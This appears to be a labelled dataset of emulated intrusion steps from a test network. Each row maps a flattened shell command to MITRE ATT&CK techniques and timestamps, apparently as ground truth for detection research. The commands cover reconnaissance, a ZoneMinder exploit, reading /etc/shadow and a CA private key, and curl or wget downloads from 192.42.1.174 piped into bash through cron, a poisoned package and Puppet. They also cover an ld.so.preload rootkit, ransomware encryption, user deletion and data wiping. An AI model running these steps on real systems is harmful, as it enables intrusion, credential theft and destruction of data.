1_sudo_sshkey;privilege-escalation_defense-evasion;T1548.003;NA;54;_bash;1758532617.86944;1758532625.0
1_sudo_sshkey;discovery;T1033;NA;37;id;1758532634.195304;1758532641.0
1_sudo_sshkey;command-and-controlpersistence_privilege-escalation;T1105_T1098.004;NA;43;cd__root__wget_http___192_42_1_174_README_txt;1758532650.518286;1758532657.0
1_sudo_sshkey;defense-evasionpersistence_privilege-escalation;T1218_T1098.004;NA;44;split___filter__cat__FILE___xargs_bash__c____C_2000_README_txt;1758532666.88568;1758532674.0
1_sudo_sshkey;defense-evasion;T1070.004;NA;40;rm;1758532683.212947;1758532690.0
1_sudo_sshkey;defense-evasion;T1070.004;NA;40;rm;1758532715.833989;1758532753.0
1_sudo_sshkey;discovery;T1033;NA;23;id;1758532778.522499;1758532785.0
1_sudo_sshkey;credential-access;T1003.008;NA;24;cat__etc_shadow;1758532809.131265;1758532815.0
1_sudo_sshkey;discovery;T1120;NA;25;lspci;1758532824.155779;1758532830.0
1_sudo_sshkey;discovery;T1120;NA;26;command__v_lsusb;1758532839.193775;1758532845.0
1_sudo_sshkey;discovery;T1124;NA;27;date;1758532854.218426;1758532860.0
1_sudo_sshkey;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758532869.240422;1758532905.0
1_validaccount_localaccount;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758713241.782522;1758713251.0
1_validaccount_localaccount;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758713260.406734;1758713279.0
1_validaccount_localaccount;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758713288.496653;1758713339.0
1_validaccount_localaccount;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758713348.407251;1758713449.0
1_validaccount_localaccount;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758713458.936916;1758713514.0
1_validaccount_localaccount;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758713540.006966;1758713547.0
1_validaccount_localaccount;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758713572.703169;1758713580.0
1_validaccount_localaccount;execution;T1059;NA;8;export_SHELL_bash;1758713589.070855;1758713596.0
1_validaccount_localaccount;execution;T1059;NA;9;export_TERM_xterm256_color;1758713605.439087;1758713612.0
1_validaccount_localaccount;execution;T1059;NA;10;stty_rows_38_columns_116;1758713621.796145;1758713629.0
1_validaccount_localaccount;execution;T1059;NA;11;export_PS1__PWN__;1758713638.161183;1758713645.0
1_validaccount_localaccount;execution;T1059;NA;12;chmod__x_linpeas_sh;1758713654.527597;1758713661.0
1_validaccount_localaccount;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758713670.749285;1758714278.0
1_validaccount_localaccount;discovery;T1033;NA;14;id;1758714287.024414;1758714293.0
1_validaccount_localaccount;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;55;find__home__ls;1758714302.167485;1758714309.0
1_validaccount_localaccount;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;56;ssh__i__home_webdev__ssh_id_rsa__o__StrictHostKeyChecking_no__root_localhost;1758714318.523535;1758714325.0
1_validaccount_localaccount;discovery;T1033;NA;37;id;1758714334.892435;1758714342.0
1_validaccount_localaccount;command-and-controlpersistence;T1105_T1136.001;NA;38;cd__root__wget__O_README_txt_http___192_42_1_174_README_txt_2;1758714351.253608;1758714358.0
1_validaccount_localaccount;defense-evasionpersistence;T1218_T1136.001;NA;39;split___filter__cat__FILE___xargs_bash__c____C_2000_README_txt;1758714367.615004;1758714374.0
1_validaccount_localaccount;defense-evasion;T1070.004;NA;40;rm;1758714383.984853;1758714391.0
1_validaccount_localaccount;defense-evasion;T1070.004;NA;40;rm;1758714400.157375;1758714437.0
1_validaccount_localaccount;discovery;T1033;NA;23;id;1758714479.227718;1758714485.0
1_validaccount_localaccount;credential-access;T1003.008;NA;24;cat__etc_shadow;1758714509.829388;1758714515.0
1_validaccount_localaccount;discovery;T1120;NA;25;lspci;1758714524.864605;1758714530.0
1_validaccount_localaccount;discovery;T1120;NA;26;command__v_lsusb;1758714539.912037;1758714545.0
1_validaccount_localaccount;discovery;T1124;NA;27;date;1758714554.948713;1758714560.0
1_validaccount_localaccount;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758714569.959464;1758714606.0
1_validaccount_pam;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758717284.146778;1758717295.0
1_validaccount_pam;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758717304.516073;1758717323.0
1_validaccount_pam;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758717332.66652;1758717383.0
1_validaccount_pam;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758717392.096445;1758717493.0
1_validaccount_pam;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758717503.086718;1758717560.0
1_validaccount_pam;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758717585.669605;1758717592.0
1_validaccount_pam;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758717618.36627;1758717625.0
1_validaccount_pam;execution;T1059;NA;8;export_SHELL_bash;1758717634.734932;1758717642.0
1_validaccount_pam;execution;T1059;NA;9;export_TERM_xterm256_color;1758717651.009745;1758717658.0
1_validaccount_pam;execution;T1059;NA;10;stty_rows_38_columns_116;1758717667.260852;1758717674.0
1_validaccount_pam;execution;T1059;NA;11;export_PS1__PWN__;1758717683.459196;1758717690.0
1_validaccount_pam;execution;T1059;NA;12;chmod__x_linpeas_sh;1758717699.830447;1758717707.0
1_validaccount_pam;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758717716.12164;1758718323.0
1_validaccount_pam;discovery;T1033;NA;14;id;1758718332.499722;1758718338.0
1_validaccount_pam;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;55;find__home__ls;1758718347.704403;1758718355.0
1_validaccount_pam;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;56;ssh__i__home_webdev__ssh_id_rsa__o__StrictHostKeyChecking_no__root_localhost;1758718364.024622;1758718371.0
1_validaccount_pam;discovery;T1033;NA;37;id;1758718380.401225;1758718387.0
1_validaccount_pam;command-and-controlcredential-access_defense-evasion_persistence;T1105_T1556.003;NA;41;cd__root__wget__O_README_txt_http___192_42_1_174_README_txt_4;1758718396.772021;1758718404.0
1_validaccount_pam;defense-evasioncredential-access_defense-evasion_persistence;T1218_T1556.003;NA;42;split___filter__cat__FILE___xargs_bash__c____C_2000_README_txt;1758718413.02104;1758718420.0
1_validaccount_pam;defense-evasion;T1070.004;NA;40;rm;1758718429.389797;1758718436.0
1_validaccount_pam;defense-evasion;T1070.004;NA;40;rm;1758718445.575844;1758718482.0
1_validaccount_pam;discovery;T1033;NA;23;id;1758718524.599995;1758718530.0
1_validaccount_pam;credential-access;T1003.008;NA;24;cat__etc_shadow;1758718554.861902;1758718560.0
1_validaccount_pam;discovery;T1120;NA;25;lspci;1758718569.900028;1758718575.0
1_validaccount_pam;discovery;T1120;NA;26;command__v_lsusb;1758718584.947052;1758718590.0
1_validaccount_pam;discovery;T1124;NA;27;date;1758718599.978621;1758718605.0
1_validaccount_pam;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758718614.992143;1758718651.0
1_validaccount_sshkey;reconnaissancereconnaissance;T1590.002_T1591;NA;1;dnsenum__f__usr_local_share_SecLists_Discovery_DNS_subdomains_top1million_5000_txt___dnsserver_192_42_0_233_attackbed_com;1758710002.790124;1758710012.0
1_validaccount_sshkey;reconnaissancereconnaissance;T1595_T1592.002;NA;2;nmap__O__sT___top_ports_100_video_attackbed_com;1758710021.553779;1758710040.0
1_validaccount_sshkey;reconnaissance;T1595.002;NA;3;nikto__host_video_attackbed_com;1758710049.675755;1758710100.0
1_validaccount_sshkey;reconnaissance;T1595.003;NA;4;ffuf__w__usr_local_share_SecLists_Discovery_Web_Content_raft_small_directories_lowercase_txt__u_http___video_attackbed_com_FUZZ;1758710109.737989;1758710211.0
1_validaccount_sshkey;initial-accessexecution;T1190_T1059.006;NA;5;exploit_unix_webapp_zoneminder_snapshots;1758710220.489091;1758710279.0
1_validaccount_sshkey;command-and-control;T1105;NA;6;upload__var_www_html_linpeas_sh;1758710304.912918;1758710312.0
1_validaccount_sshkey;execution;T1059;NA;7;python3__c__import_pty_pty_spawn___bash_____;1758710337.647834;1758710344.0
1_validaccount_sshkey;execution;T1059;NA;8;export_SHELL_bash;1758710353.979436;1758710361.0
1_validaccount_sshkey;execution;T1059;NA;9;export_TERM_xterm256_color;1758710370.225498;1758710377.0
1_validaccount_sshkey;execution;T1059;NA;10;stty_rows_38_columns_116;1758710386.558593;1758710393.0
1_validaccount_sshkey;execution;T1059;NA;11;export_PS1__PWN__;1758710402.802055;1758710410.0
1_validaccount_sshkey;execution;T1059;NA;12;chmod__x_linpeas_sh;1758710419.117212;1758710426.0
1_validaccount_sshkey;discoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscoverydiscovery;T1087_T1083_T1201_T1069_T1057_T1518_T1082_T1614_T1016_T1049_T1033_T1007_T1615;NA;13;__linpeas_sh__s__q__N_2___dev_null;1758710435.39247;1758711042.0
1_validaccount_sshkey;discovery;T1033;NA;14;id;1758711051.758545;1758711057.0
1_validaccount_sshkey;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;55;find__home__ls;1758711066.997499;1758711074.0
1_validaccount_sshkey;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;56;ssh__i__home_webdev__ssh_id_rsa__o__StrictHostKeyChecking_no__root_localhost;1758711083.319104;1758711090.0
1_validaccount_sshkey;discovery;T1033;NA;37;id;1758711099.707471;1758711107.0
1_validaccount_sshkey;command-and-controlpersistence_privilege-escalation;T1105_T1098.004;NA;43;cd__root__wget_http___192_42_1_174_README_txt;1758711116.08778;1758711123.0
1_validaccount_sshkey;defense-evasionpersistence_privilege-escalation;T1218_T1098.004;NA;44;split___filter__cat__FILE___xargs_bash__c____C_2000_README_txt;1758711132.467808;1758711139.0
1_validaccount_sshkey;defense-evasion;T1070.004;NA;40;rm;1758711148.778325;1758711156.0
1_validaccount_sshkey;defense-evasion;T1070.004;NA;40;rm;1758711165.005334;1758711202.0
1_validaccount_sshkey;discovery;T1033;NA;23;id;1758711244.067281;1758711250.0
1_validaccount_sshkey;credential-access;T1003.008;NA;24;cat__etc_shadow;1758711274.668935;1758711280.0
1_validaccount_sshkey;discovery;T1120;NA;25;lspci;1758711289.693129;1758711295.0
1_validaccount_sshkey;discovery;T1120;NA;26;command__v_lsusb;1758711304.73999;1758711310.0
1_validaccount_sshkey;discovery;T1124;NA;27;date;1758711319.769071;1758711325.0
1_validaccount_sshkey;defense-evasion_discovery;T1497.001;NA;28;find__usr__name___virtualbox__;1758711334.793252;1758711370.0
2_cron;lateral-movement;T1021.004;NA;1;hostname;1759313652.955559;1759313659.0
2_cron;command-and-controlcommand-and-control;T1071.001_T1573.001;NA;2;start_https_listener;1759313698.689764;1759313704.0
2_cron;command-and-control;T1105;NA;3;put;1759313729.002694;1759313735.0
2_cron;persistence_privilege-escalationexecution;T1547_T1569;NA;4;sed__i__s_____bin__sh_____bin__sh_n__usr__bin__zmcontroller____n____usr_share_awffull_awffull;1759313744.147666;1759313750.0
2_cron;discovery;T1083;NA;5;ls;1759313759.232391;1759314606.0
2_cron;discovery;T1057;NA;6;ps;1759314615.295482;1759314621.0
2_cron;discovery;T1007;NA;7;__d_____mariadb;1759314630.356325;1759314636.0
2_cron;credential-access;T1003;NA;8;process_dump;1759314660.405776;1759314666.0
2_cron;discovery;T1049;NA;9;netstat;1759314675.862978;1759314681.0
2_cron;discovery;T1016;NA;10;ifconfig;1759314690.953936;1759314697.0
2_cron;credential-accessexfiltration;T1003.008_T1041;NA;11;download;1759314721.048554;1759314727.0
2_cron;collectioncollection;T1560.001_T1074.001;NA;12;execute;1759314736.107786;1759314742.0
2_cron;exfiltration;T1041;NA;13;download;1759314781.186505;1759314787.0
2_cron;defense-evasion;T1070.004;NA;14;rm;1759314796.25383;1759314802.0
2_cron;collection;T1005;NA;15;download;1759314811.306144;1759314817.0
2_cron;discovery;T1201;NA;16;execute;1759314826.367095;1759314832.0
2_cron;credential-access;T1003.008;NA;17;execute;1759314841.431046;1759314847.0
2_cron;discovery;T1201;NA;18;execute;1759314856.490044;1759314862.0
2_cron;command-and-controldiscoverydiscovery;T1105_T1046_T1018;NA;19;upload;1759314871.560183;1759314878.0
2_cron;discoverydiscovery;T1046_T1018;NA;20;execute;1759314887.136502;1759314893.0
2_cron;discoverydiscovery;T1046_T1018;NA;21;execute;1759314902.19049;1759314940.0
2_rootkit;lateral-movement;T1021;NA;22;id;1759318379.085449;1759318385.0
2_rootkit;command-and-control;T1105;NA;23;put;1759318448.398417;1759318454.0
2_rootkit;command-and-controlcommand-and-control;T1071.001_T1573;NA;24;start_https_listener;1759318507.752769;1759318513.0
2_rootkit;command-and-control;T1105;NA;3;put;1759318537.995395;1759318544.0
2_rootkit;persistence_privilege-escalation;T1543.002;NA;25;ExecStartPre_sudo__g_fax_bash__c__zmcontroller__;1759318673.179342;1759318694.0
2_rootkit;persistence_privilege-escalation;T1543.002;NA;26;_wq__;1759318733.198081;1759318739.0
2_rootkit;defense-evasiondefense-evasionpersistence_privilege-escalation_defense-evasion;T1014_T1564_T1574;NA;27;echo__usr_lib_selinux_so_3_____etc_ld_so_preload;1759318748.252204;1759318754.0
2_rootkit;persistence_privilege-escalation;T1543.002;NA;28;systemctl_daemon_reload;1759318763.266434;1759318769.0
2_rootkit;persistence_privilege-escalation;T1543.002;NA;29;systemctl_restart_zoneminder_service;1759318778.554074;1759318788.0
2_rootkit;discovery;T1083;NA;5;ls;1759318797.201025;1759318803.0
2_rootkit;discovery;T1057;NA;6;ps;1759318812.270203;1759318818.0
2_rootkit;discovery;T1007;NA;7;__d_____mariadb;1759318827.321367;1759318833.0
2_rootkit;credential-access;T1003;NA;8;process_dump;1759318857.361178;1759318863.0
2_rootkit;discovery;T1049;NA;9;netstat;1759318872.792447;1759318878.0
2_rootkit;discovery;T1016;NA;10;ifconfig;1759318887.884125;1759318893.0
2_rootkit;credential-accessexfiltration;T1003.008_T1041;NA;11;download;1759318917.953859;1759318923.0
2_rootkit;collectioncollection;T1560.001_T1074.001;NA;12;execute;1759318933.022466;1759318939.0
2_rootkit;exfiltration;T1041;NA;13;download;1759318978.106077;1759318984.0
2_rootkit;defense-evasion;T1070.004;NA;14;rm;1759318993.174262;1759318999.0
2_rootkit;collection;T1005;NA;15;download;1759319008.221606;1759319014.0
2_rootkit;discovery;T1201;NA;16;execute;1759319023.29192;1759319029.0
2_rootkit;credential-access;T1003.008;NA;17;execute;1759319038.347218;1759319044.0
2_rootkit;discovery;T1201;NA;18;execute;1759319053.411112;1759319059.0
2_rootkit;command-and-controldiscoverydiscovery;T1105_T1046_T1018;NA;19;upload;1759319068.489481;1759319074.0
2_rootkit;discoverydiscovery;T1046_T1018;NA;20;execute;1759319083.954815;1759319089.0
2_rootkit;discoverydiscovery;T1046_T1018;NA;21;execute;1759319099.002546;1759319137.0
3_ssh_apt;defense-evasion_persistence_privilege-escalation_initial-accesscredential-accesspersistence_initial-access;T1078.002_T1110.001_T1133;NA;1;hydra__C_user_pass_combo_txt__s_10022_fw_attackbed_com_ssh;1765535300.69319;1765535316.0
3_ssh_apt;defense-evasion_persistence_privilege-escalation_initial-access;T1078.002;NA;2;id;1765535321.802248;1765535331.0
3_ssh_apt;credential-access_discovery;T1040;NA;3;tcpdump__A_port_21_;1765535337.926744;1765535364.0
3_ssh_apt;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;4;_i_;1765535388.037143;1765535394.0
3_ssh_apt;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;5;rambo_;1765535403.044203;1765535409.0
3_ssh_apt;credential-access;T1003.008;NA;6;cat__etc_shadow_;1765535433.052241;1765535439.0
3_ssh_apt;collection;T1213;NA;7;cat__etc_puppetlabs_puppetserver_ca_ca_key_pem_;1765535448.058127;1765535454.0
3_ssh_apt;collection;T1039;NA;8;cat__media_share_healthcheck_cron_sh_;1765535463.062878;1765535469.0
3_ssh_apt;discovery;T1083;NA;9;ls__l__var_www_html_debian_;1765535548.613553;1765535554.0
3_ssh_apt;execution;T1059.004;NA;10;apt_update____apt_install__y_dpkg_dev_;1765535563.621796;1765535589.0
3_ssh_apt;defense-evasiondefense-evasion;T1036.005_T1564.001;NA;11;mkdir__tmp__tmux_data_;1765535598.630661;1765535604.0
3_ssh_apt;persistence_privilege-escalation_defense-evasion;T1574;NA;12;dpkg_deb__R__var_www_html_debian_healthcheckd_1_0_1_amd64_deb_healthcheckd_;1765535628.640719;1765535634.0
3_ssh_apt;executionpersistence_privilege-escalation_defense-evasion;T1059_T1574;NA;13;__s_1_0_1_1_0_2_g_;1765535673.650525;1765535694.0
3_ssh_apt;executionpersistence_privilege-escalation_defense-evasion;T1059_T1574;NA;14;_wq_;1765535703.654988;1765535709.0
3_ssh_apt;execution_persistence_privilege-escalationcommand-and-controlcommand-and-control;T1053.003_T1105_T1071.001;NA;15;echo____5_________root_curl_http___192_42_1_174_8888_install_sh___bash_____etc_cron_d_health;1765535808.731411;1765535829.0
3_ssh_apt;execution_persistence_privilege-escalationcommand-and-controlcommand-and-control;T1053.003_T1105_T1071.001;NA;16;_wq_;1765535868.743981;1765535874.0
3_ssh_apt;execution_lateral-movement;T1072;NA;17;dpkg_deb__b_healthcheckd__var_www_html_debian_healthcheckd_1_0_2_amd64_deb_;1765535898.844715;1765535905.0
3_ssh_apt;execution_lateral-movement;T1072;NA;18;dpkg_scanpackages_____gzip__c9____Packages_gz_;1765535929.057214;1765536115.0
3_ssh_apt;execution;T1059;NA;19;shell;1765536337.950733;1765536345.0
3_ssh_apt;execution;T1059;NA;20;python3__c__import_pty_pty_spawn___bash_____;1765536354.275887;1765536361.0
3_ssh_apt;execution;T1059;NA;21;export_SHELL_bash;1765536370.648064;1765536378.0
3_ssh_apt;execution;T1059;NA;22;export_TERM_xterm256_color;1765536387.018547;1765536394.0
3_ssh_apt;execution;T1059;NA;23;stty_rows_38_columns_116;1765536403.398399;1765536410.0
3_ssh_apt;execution;T1059;NA;24;export_PS1__PWN__;1765536419.72217;1765536427.0
3_ssh_apt;impactcommand-and-control;T1486_T1105;NA;25;curl_http___192_42_1_174_donotcry___donotcry;1765536436.091378;1765536443.0
3_ssh_apt;impactimpact;T1486_T1565.001;NA;26;_lib64_ld_linux_x86_64_so_2_donotcry_encrypt__media_data_Images;1765536452.463304;1765536462.0
3_ssh_apt;discovery;T1018;NA;27;find__media_data_Images;1765536468.850467;1765536476.0
3_ssh_apt;discovery;T1087.001;NA;28;cat__etc_passwd;1765536485.171055;1765536492.0
3_ssh_apt;impact;T1531;NA;29;userdel__f_john;1765536501.35968;1765536508.0
3_ssh_apt;impact;T1485;NA;30;rm;1765536517.724594;1765536525.0
3_ssh_apt;impact;T1490;NA;31;rm;1765536534.092586;1765536541.0
3_ssh_apt;impact;T1489;NA;32;systemctl_stop_exim4_service;1765536550.468733;1765536587.0
3_ssh_healthcheck;defense-evasion_persistence_privilege-escalation_initial-accesscredential-accesspersistence_initial-access;T1078.002_T1110.001_T1133;NA;1;hydra__C_user_pass_combo_txt__s_10022_fw_attackbed_com_ssh;1765463281.325538;1765463299.0
3_ssh_healthcheck;defense-evasion_persistence_privilege-escalation_initial-access;T1078.002;NA;2;id;1765463304.641907;1765463315.0
3_ssh_healthcheck;credential-access_discovery;T1040;NA;3;tcpdump__A_port_21_;1765463321.239447;1765463347.0
3_ssh_healthcheck;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;4;_i_;1765463371.329143;1765463377.0
3_ssh_healthcheck;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;5;rambo_;1765463386.333807;1765463392.0
3_ssh_healthcheck;credential-access;T1003.008;NA;6;cat__etc_shadow_;1765463416.342266;1765463422.0
3_ssh_healthcheck;collection;T1213;NA;7;cat__etc_puppetlabs_puppetserver_ca_ca_key_pem_;1765463431.344369;1765463437.0
3_ssh_healthcheck;collection;T1039;NA;8;cat__media_share_healthcheck_cron_sh_;1765463446.346903;1765463452.0
3_ssh_healthcheck;lateral-movement;T1080;NA;33;curl_http___192_42_1_174_8888_install_sh___bash_;1765463606.9038;1765463627.0
3_ssh_healthcheck;lateral-movement;T1080;NA;34;_wq_;1765463666.915997;1765463672.0
3_ssh_healthcheck;discovery;T1082;NA;35;sysinfo;1765463682.148525;1765464011.0
3_ssh_healthcheck;discovery;T1033;NA;36;getuid;1765464020.967379;1765464028.0
3_ssh_healthcheck;execution;T1059;NA;19;shell;1765464068.597781;1765464075.0
3_ssh_healthcheck;execution;T1059;NA;20;python3__c__import_pty_pty_spawn___bash_____;1765464084.867733;1765464092.0
3_ssh_healthcheck;execution;T1059;NA;21;export_SHELL_bash;1765464101.259166;1765464108.0
3_ssh_healthcheck;execution;T1059;NA;22;export_TERM_xterm256_color;1765464117.526284;1765464124.0
3_ssh_healthcheck;execution;T1059;NA;23;stty_rows_38_columns_116;1765464133.862131;1765464141.0
3_ssh_healthcheck;execution;T1059;NA;24;export_PS1__PWN__;1765464150.191734;1765464157.0
3_ssh_healthcheck;impactcommand-and-control;T1486_T1105;NA;25;curl_http___192_42_1_174_donotcry___donotcry;1765464166.532105;1765464173.0
3_ssh_healthcheck;impactimpact;T1486_T1565.001;NA;26;_lib64_ld_linux_x86_64_so_2_donotcry_encrypt__media_data_Images;1765464182.799603;1765464193.0
3_ssh_healthcheck;discovery;T1018;NA;27;find__media_data_Images;1765464199.182172;1765464206.0
3_ssh_healthcheck;discovery;T1087.001;NA;28;cat__etc_passwd;1765464215.508982;1765464222.0
3_ssh_healthcheck;impact;T1531;NA;29;userdel__f_john;1765464231.795879;1765464239.0
3_ssh_healthcheck;impact;T1485;NA;30;rm;1765464248.132123;1765464255.0
3_ssh_healthcheck;impact;T1490;NA;31;rm;1765464264.503554;1765464271.0
3_ssh_healthcheck;impact;T1489;NA;32;systemctl_stop_exim4_service;1765464280.830944;1765464318.0
3_ssh_puppet;defense-evasion_persistence_privilege-escalation_initial-accesscredential-accesspersistence_initial-access;T1078.002_T1110.001_T1133;NA;1;hydra__C_user_pass_combo_txt__s_10022_fw_attackbed_com_ssh;1765543351.203732;1765543367.0
3_ssh_puppet;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;37;id;1765543372.103696;1765543379.0
3_ssh_puppet;credential-access_discovery;T1040;NA;3;tcpdump__A_port_21_;1765543388.379478;1765543414.0
3_ssh_puppet;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;4;_i_;1765543438.489389;1765543444.0
3_ssh_puppet;defense-evasion_persistence_privilege-escalation_initial-access;T1078.003;NA;5;rambo_;1765543453.494358;1765543459.0
3_ssh_puppet;credential-access;T1003.008;NA;6;cat__etc_shadow_;1765543483.50118;1765543489.0
3_ssh_puppet;collection;T1213;NA;7;cat__etc_puppetlabs_puppetserver_ca_ca_key_pem_;1765543498.506932;1765543504.0
3_ssh_puppet;collection;T1039;NA;8;cat__media_share_healthcheck_cron_sh_;1765543513.513759;1765543519.0
3_ssh_puppet;execution_lateral-movementcommand-and-controlexecution;T1072_T1105_T1059.004;NA;38;class_blah2___exec____curl_http___192_42_1_174_8888_install_sh___bash______path_______usr_bin____bin________;1765543644.092969;1765543665.0
3_ssh_puppet;execution_lateral-movementcommand-and-controlexecution;T1072_T1105_T1059.004;NA;39;node__linuxshare_attackbed_local______class____blah2_______;1765543674.097812;1765543695.0
3_ssh_puppet;execution_lateral-movementcommand-and-controlexecution;T1072_T1105_T1059.004;NA;40;_wq_;1765543734.107628;1765543920.0
3_ssh_puppet;execution;T1059;NA;19;shell;1765543930.278885;1765543937.0
3_ssh_puppet;execution;T1059;NA;20;python3__c__import_pty_pty_spawn___bash_____;1765543946.524163;1765543953.0
3_ssh_puppet;execution;T1059;NA;21;export_SHELL_bash;1765543962.809181;1765543970.0
3_ssh_puppet;execution;T1059;NA;22;export_TERM_xterm256_color;1765543979.032961;1765543986.0
3_ssh_puppet;execution;T1059;NA;23;stty_rows_38_columns_116;1765543995.403999;1765544002.0
3_ssh_puppet;execution;T1059;NA;24;export_PS1__PWN__;1765544011.731326;1765544019.0
3_ssh_puppet;impactcommand-and-control;T1486_T1105;NA;25;curl_http___192_42_1_174_donotcry___donotcry;1765544028.10069;1765544035.0
3_ssh_puppet;impactimpact;T1486_T1565.001;NA;26;_lib64_ld_linux_x86_64_so_2_donotcry_encrypt__media_data_Images;1765544044.419965;1765544055.0
3_ssh_puppet;discovery;T1018;NA;27;find__media_data_Images;1765544061.795878;1765544069.0
3_ssh_puppet;discovery;T1087.001;NA;28;cat__etc_passwd;1765544078.134093;1765544085.0
3_ssh_puppet;impact;T1531;NA;29;userdel__f_john;1765544094.47707;1765544101.0
3_ssh_puppet;impact;T1485;NA;30;rm;1765544110.8049;1765544118.0
3_ssh_puppet;impact;T1490;NA;31;rm;1765544127.187437;1765544134.0
3_ssh_puppet;impact;T1489;NA;32;systemctl_stop_exim4_service;1765544143.56019;1765544180.0
3_vnc_apt;credential-accesslateral-movement;T1110.001_T1021.005;NA;41;items_LISTA_;1765562942.102559;1765562963.0
3_vnc_apt;lateral-movement;T1021.005;NA;42;click;1765562972.236494;1765562981.0
3_vnc_apt;lateral-movement;T1021.005;NA;43;terminal;1765562990.251434;1765563002.0
3_vnc_apt;lateral-movement;T1021.005;NA;44;sudo__i;1765563026.269497;1765563045.0
3_vnc_apt;credential-access;T1003.008;NA;45;key;1765563114.315146;1765563125.0
3_vnc_apt;collection;T1213;NA;46;key;1765563149.336021;1765563160.0
3_vnc_apt;collection;T1039;NA;47;key;1765563184.355962;1765563192.0
3_vnc_apt;discovery;T1083;NA;48;key;1765563216.369842;1765563222.0
3_vnc_apt;execution;T1059.004;NA;49;key;1765563246.384436;1765563612.0
3_vnc_apt;defense-evasiondefense-evasion;T1036.005_T1564.001;NA;50;key;1765563636.401406;1765563642.0
3_vnc_apt;persistence_privilege-escalation_defense-evasion;T1574;NA;51;key;1765563696.439139;1765563702.0
3_vnc_apt;executionpersistence_privilege-escalation_defense-evasion;T1059_T1574;NA;52;sed__i__s_1__0_1_1__0_2_g__DEBIAN_control_;1765563741.455037;1765563747.0
3_vnc_apt;execution_persistence_privilege-escalationcommand-and-controlcommand-and-control;T1053.003_T1105_T1071.001;NA;53;sed__i___invoke_rc_a_echo____5_________root__usr_bin_curl_http___192_42_1_174_8888_install_sh____bin_bash_____etc_cron_d_health__DEBIAN_postinst_;1765563771.471376;1765563777.0
3_vnc_apt;execution_lateral-movement;T1072;NA;54;key;1765563846.524044;1765563852.0
3_vnc_apt;execution_lateral-movement;T1072;NA;54;key;1765563906.553629;1765564092.0
3_vnc_apt;execution;T1059;NA;19;shell;1765564238.138155;1765564245.0
3_vnc_apt;execution;T1059;NA;20;python3__c__import_pty_pty_spawn___bash_____;1765564254.497476;1765564261.0
3_vnc_apt;execution;T1059;NA;21;export_SHELL_bash;1765564270.774186;1765564277.0
3_vnc_apt;execution;T1059;NA;22;export_TERM_xterm256_color;1765564286.997685;1765564294.0
3_vnc_apt;execution;T1059;NA;23;stty_rows_38_columns_116;1765564303.308279;1765564310.0
3_vnc_apt;execution;T1059;NA;24;export_PS1__PWN__;1765564319.643304;1765564326.0
3_vnc_apt;impactcommand-and-control;T1486_T1105;NA;25;curl_http___192_42_1_174_donotcry___donotcry;1765564335.86239;1765564343.0
3_vnc_apt;impactimpact;T1486_T1565.001;NA;26;_lib64_ld_linux_x86_64_so_2_donotcry_encrypt__media_data_Images;1765564352.123251;1765564362.0
3_vnc_apt;discovery;T1018;NA;27;find__media_data_Images;1765564368.485283;1765564375.0
3_vnc_apt;discovery;T1087.001;NA;28;cat__etc_passwd;1765564384.703938;1765564392.0
3_vnc_apt;impact;T1531;NA;29;userdel__f_john;1765564401.034618;1765564408.0
3_vnc_apt;impact;T1485;NA;30;rm;1765564417.413314;1765564424.0
3_vnc_apt;impact;T1490;NA;31;rm;1765564433.707637;1765564441.0
3_vnc_apt;impact;T1489;NA;32;systemctl_stop_exim4_service;1765564450.087127;1765564487.0
3_vnc_healthcheck;credential-accesslateral-movement;T1110.001_T1021.005;NA;55;items_LISTA_;1765548811.111336;1765549357.0
3_vnc_healthcheck;lateral-movement;T1021.005;NA;42;click;1765549366.429517;1765549375.0
